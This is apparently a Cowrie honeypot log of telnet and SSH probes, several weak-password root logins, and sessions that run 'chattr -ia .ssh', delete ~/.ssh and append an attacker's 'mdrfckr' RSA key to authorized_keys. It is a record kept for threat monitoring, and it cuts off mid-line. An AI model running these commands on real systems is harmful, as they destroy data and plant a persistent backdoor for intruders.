{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60774,"dst_ip":"1.2.3.4","dst_port":23,"session":"089d56621532","protocol":"telnet","message":"New connection: 212.227.235.229:60774 (1.2.3.4:23) [session: 089d56621532]","sensor":"my-vps","timestamp":"2025-09-09T02:35:09.298985Z"}
{"eventid":"cowrie.session.closed","duration":21.87460947036743,"message":"Connection lost after 21 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:10.559569Z","src_ip":"179.37.34.219","session":"e28893ce67b6"}
{"eventid":"cowrie.session.closed","duration":13.83164668083191,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:10.936945Z","src_ip":"212.227.235.229","session":"565b215f02b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60820,"dst_ip":"1.2.3.4","dst_port":23,"session":"1f8095cce93a","protocol":"telnet","message":"New connection: 212.227.235.229:60820 (1.2.3.4:23) [session: 1f8095cce93a]","sensor":"my-vps","timestamp":"2025-09-09T02:35:11.175727Z"}
{"eventid":"cowrie.session.closed","duration":13.705729722976685,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:12.004533Z","src_ip":"212.227.235.229","session":"7393e106a1da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60921,"dst_ip":"1.2.3.4","dst_port":23,"session":"46ae18b7dc8d","protocol":"telnet","message":"New connection: 212.227.235.229:60921 (1.2.3.4:23) [session: 46ae18b7dc8d]","sensor":"my-vps","timestamp":"2025-09-09T02:35:12.299212Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59915,"dst_ip":"1.2.3.4","dst_port":23,"session":"7f95947bf066","protocol":"telnet","message":"New connection: 212.227.125.160:59915 (1.2.3.4:23) [session: 7f95947bf066]","sensor":"my-vps","timestamp":"2025-09-09T02:35:12.731884Z"}
{"eventid":"cowrie.session.closed","duration":13.245535135269165,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:13.720385Z","src_ip":"212.227.235.229","session":"ca8ffa1a51d9"}
{"eventid":"cowrie.session.closed","duration":13.734257698059082,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:13.951607Z","src_ip":"212.227.235.229","session":"ea14f80493a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60926,"dst_ip":"1.2.3.4","dst_port":23,"session":"a16bd78cffb0","protocol":"telnet","message":"New connection: 212.227.235.229:60926 (1.2.3.4:23) [session: a16bd78cffb0]","sensor":"my-vps","timestamp":"2025-09-09T02:35:13.960858Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60928,"dst_ip":"1.2.3.4","dst_port":23,"session":"da46acaf6345","protocol":"telnet","message":"New connection: 212.227.235.229:60928 (1.2.3.4:23) [session: da46acaf6345]","sensor":"my-vps","timestamp":"2025-09-09T02:35:14.298693Z"}
{"eventid":"cowrie.session.closed","duration":13.597461223602295,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:17.842300Z","src_ip":"212.227.235.229","session":"abe6a20f911f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60966,"dst_ip":"1.2.3.4","dst_port":23,"session":"c4749cb9b2c6","protocol":"telnet","message":"New connection: 212.227.235.229:60966 (1.2.3.4:23) [session: c4749cb9b2c6]","sensor":"my-vps","timestamp":"2025-09-09T02:35:18.103758Z"}
{"eventid":"cowrie.session.closed","duration":13.734139680862427,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:23.033056Z","src_ip":"212.227.235.229","session":"089d56621532"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32884,"dst_ip":"1.2.3.4","dst_port":23,"session":"aec61058f006","protocol":"telnet","message":"New connection: 212.227.235.229:32884 (1.2.3.4:23) [session: aec61058f006]","sensor":"my-vps","timestamp":"2025-09-09T02:35:23.262597Z"}
{"eventid":"cowrie.session.closed","duration":13.684480667114258,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:24.859543Z","src_ip":"212.227.235.229","session":"1f8095cce93a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32895,"dst_ip":"1.2.3.4","dst_port":23,"session":"7129663ce747","protocol":"telnet","message":"New connection: 212.227.235.229:32895 (1.2.3.4:23) [session: 7129663ce747]","sensor":"my-vps","timestamp":"2025-09-09T02:35:25.110725Z"}
{"eventid":"cowrie.session.closed","duration":13.650156259536743,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:25.949304Z","src_ip":"212.227.235.229","session":"46ae18b7dc8d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32899,"dst_ip":"1.2.3.4","dst_port":23,"session":"ca540f25c49b","protocol":"telnet","message":"New connection: 212.227.235.229:32899 (1.2.3.4:23) [session: ca540f25c49b]","sensor":"my-vps","timestamp":"2025-09-09T02:35:26.223272Z"}
{"eventid":"cowrie.session.closed","duration":13.868088006973267,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:27.828887Z","src_ip":"212.227.235.229","session":"a16bd78cffb0"}
{"eventid":"cowrie.session.closed","duration":13.757924318313599,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:28.056489Z","src_ip":"212.227.235.229","session":"da46acaf6345"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32911,"dst_ip":"1.2.3.4","dst_port":23,"session":"07a7bb98a980","protocol":"telnet","message":"New connection: 212.227.235.229:32911 (1.2.3.4:23) [session: 07a7bb98a980]","sensor":"my-vps","timestamp":"2025-09-09T02:35:28.200045Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32913,"dst_ip":"1.2.3.4","dst_port":23,"session":"494f9fac53f0","protocol":"telnet","message":"New connection: 212.227.235.229:32913 (1.2.3.4:23) [session: 494f9fac53f0]","sensor":"my-vps","timestamp":"2025-09-09T02:35:28.234546Z"}
{"eventid":"cowrie.session.closed","duration":13.612411975860596,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:31.716095Z","src_ip":"212.227.235.229","session":"c4749cb9b2c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33068,"dst_ip":"1.2.3.4","dst_port":23,"session":"57415d58b7c6","protocol":"telnet","message":"New connection: 212.227.235.229:33068 (1.2.3.4:23) [session: 57415d58b7c6]","sensor":"my-vps","timestamp":"2025-09-09T02:35:32.028182Z"}
{"eventid":"cowrie.session.closed","duration":13.52079176902771,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:36.783326Z","src_ip":"212.227.235.229","session":"aec61058f006"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33099,"dst_ip":"1.2.3.4","dst_port":23,"session":"75ddda3b4a2e","protocol":"telnet","message":"New connection: 212.227.235.229:33099 (1.2.3.4:23) [session: 75ddda3b4a2e]","sensor":"my-vps","timestamp":"2025-09-09T02:35:37.023952Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.69.116","src_port":42414,"dst_ip":"1.2.3.4","dst_port":22,"session":"34ba726470be","protocol":"ssh","message":"New connection: 196.251.69.116:42414 (1.2.3.4:22) [session: 34ba726470be]","sensor":"my-vps","timestamp":"2025-09-09T02:35:38.426615Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:38.446711Z","src_ip":"196.251.69.116","session":"34ba726470be"}
{"eventid":"cowrie.session.closed","duration":14.050525188446045,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:39.161164Z","src_ip":"212.227.235.229","session":"7129663ce747"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33122,"dst_ip":"1.2.3.4","dst_port":23,"session":"67d6d017bee4","protocol":"telnet","message":"New connection: 212.227.235.229:33122 (1.2.3.4:23) [session: 67d6d017bee4]","sensor":"my-vps","timestamp":"2025-09-09T02:35:39.394810Z"}
{"eventid":"cowrie.session.closed","duration":13.53840684890747,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:39.761611Z","src_ip":"212.227.235.229","session":"ca540f25c49b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33124,"dst_ip":"1.2.3.4","dst_port":23,"session":"98d80d554a4d","protocol":"telnet","message":"New connection: 212.227.235.229:33124 (1.2.3.4:23) [session: 98d80d554a4d]","sensor":"my-vps","timestamp":"2025-09-09T02:35:40.028931Z"}
{"eventid":"cowrie.session.closed","duration":13.609790325164795,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:41.809743Z","src_ip":"212.227.235.229","session":"07a7bb98a980"}
{"eventid":"cowrie.session.closed","duration":13.722167491912842,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:41.956651Z","src_ip":"212.227.235.229","session":"494f9fac53f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33248,"dst_ip":"1.2.3.4","dst_port":23,"session":"da5eac7efa20","protocol":"telnet","message":"New connection: 212.227.235.229:33248 (1.2.3.4:23) [session: da5eac7efa20]","sensor":"my-vps","timestamp":"2025-09-09T02:35:41.983468Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56083,"dst_ip":"1.2.3.4","dst_port":22,"session":"53f0f1a0f572","protocol":"ssh","message":"New connection: 212.227.235.229:56083 (1.2.3.4:22) [session: 53f0f1a0f572]","sensor":"my-vps","timestamp":"2025-09-09T02:35:42.031617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:35:42.036150Z","src_ip":"212.227.235.229","session":"53f0f1a0f572"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33249,"dst_ip":"1.2.3.4","dst_port":23,"session":"55a84caed96a","protocol":"telnet","message":"New connection: 212.227.235.229:33249 (1.2.3.4:23) [session: 55a84caed96a]","sensor":"my-vps","timestamp":"2025-09-09T02:35:42.230287Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:35:42.290161Z","src_ip":"212.227.235.229","session":"53f0f1a0f572"}
{"eventid":"cowrie.login.success","username":"root","password":"scenic","message":"login attempt [root/scenic] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:35:43.294911Z","src_ip":"212.227.235.229","session":"53f0f1a0f572"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:35:43.829305Z","src_ip":"212.227.235.229","session":"53f0f1a0f572"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:35:43.830008Z","src_ip":"212.227.235.229","session":"53f0f1a0f572"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:35:43.831167Z","src_ip":"212.227.235.229","session":"53f0f1a0f572"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:44.083885Z","src_ip":"212.227.235.229","session":"53f0f1a0f572"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:35:44.679985Z","src_ip":"212.227.235.229","session":"53f0f1a0f572"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:35:44.680639Z","src_ip":"212.227.235.229","session":"53f0f1a0f572"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:35:44.936489Z","src_ip":"212.227.235.229","session":"53f0f1a0f572"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:44.937334Z","src_ip":"212.227.235.229","session":"53f0f1a0f572"}
{"eventid":"cowrie.session.closed","duration":13.001686573028564,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:45.029801Z","src_ip":"212.227.235.229","session":"57415d58b7c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56643,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b59d45b4fa0","protocol":"ssh","message":"New connection: 212.227.235.229:56643 (1.2.3.4:22) [session: 1b59d45b4fa0]","sensor":"my-vps","timestamp":"2025-09-09T02:35:45.182117Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:35:45.192146Z","src_ip":"212.227.235.229","session":"1b59d45b4fa0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33279,"dst_ip":"1.2.3.4","dst_port":23,"session":"bb74d7a7d431","protocol":"telnet","message":"New connection: 212.227.235.229:33279 (1.2.3.4:23) [session: bb74d7a7d431]","sensor":"my-vps","timestamp":"2025-09-09T02:35:45.244801Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:35:45.439483Z","src_ip":"212.227.235.229","session":"1b59d45b4fa0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:35:46.436263Z","src_ip":"212.227.235.229","session":"1b59d45b4fa0"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11780,"dst_ip":"1.2.3.4","dst_port":22,"session":"11596ad235fe","protocol":"ssh","message":"New connection: 185.152.45.241:11780 (1.2.3.4:22) [session: 11596ad235fe]","sensor":"my-vps","timestamp":"2025-09-09T02:35:46.855410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:35:46.860817Z","src_ip":"185.152.45.241","session":"11596ad235fe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:35:46.923827Z","src_ip":"185.152.45.241","session":"11596ad235fe"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin","message":"login attempt [root/Admin] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:35:47.144602Z","src_ip":"185.152.45.241","session":"11596ad235fe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:35:47.327026Z","src_ip":"185.152.45.241","session":"11596ad235fe"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:35:47.327758Z","src_ip":"185.152.45.241","session":"11596ad235fe"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:35:47.328988Z","src_ip":"185.152.45.241","session":"11596ad235fe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:47.379042Z","src_ip":"185.152.45.241","session":"11596ad235fe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:35:47.497562Z","src_ip":"185.152.45.241","session":"11596ad235fe"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:35:47.498438Z","src_ip":"185.152.45.241","session":"11596ad235fe"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:35:47.564574Z","src_ip":"185.152.45.241","session":"11596ad235fe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:47.565455Z","src_ip":"185.152.45.241","session":"11596ad235fe"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11781,"dst_ip":"1.2.3.4","dst_port":22,"session":"961d11c44c9b","protocol":"ssh","message":"New connection: 185.152.45.241:11781 (1.2.3.4:22) [session: 961d11c44c9b]","sensor":"my-vps","timestamp":"2025-09-09T02:35:47.608757Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:35:47.609522Z","src_ip":"185.152.45.241","session":"961d11c44c9b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 